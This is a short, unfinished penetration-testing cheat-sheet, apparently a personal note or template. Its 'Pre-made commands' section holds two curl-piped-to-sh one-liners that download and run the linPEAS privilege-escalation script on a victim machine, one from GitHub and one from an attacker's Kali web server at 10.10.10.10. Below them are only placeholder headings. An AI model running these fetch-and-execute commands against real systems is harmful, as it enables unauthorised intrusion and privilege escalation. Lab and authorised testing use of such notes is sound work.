Pre-made commands

Curl and run linPEAS straight from github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Curl and run linPEAS from web server running on kali box
curl 10.10.10.10/linpeas.sh | sh #Victim

Flags

FlagDescription
-xWhat does it do

Useful Scripts

Useful bash script
#!/bin/bash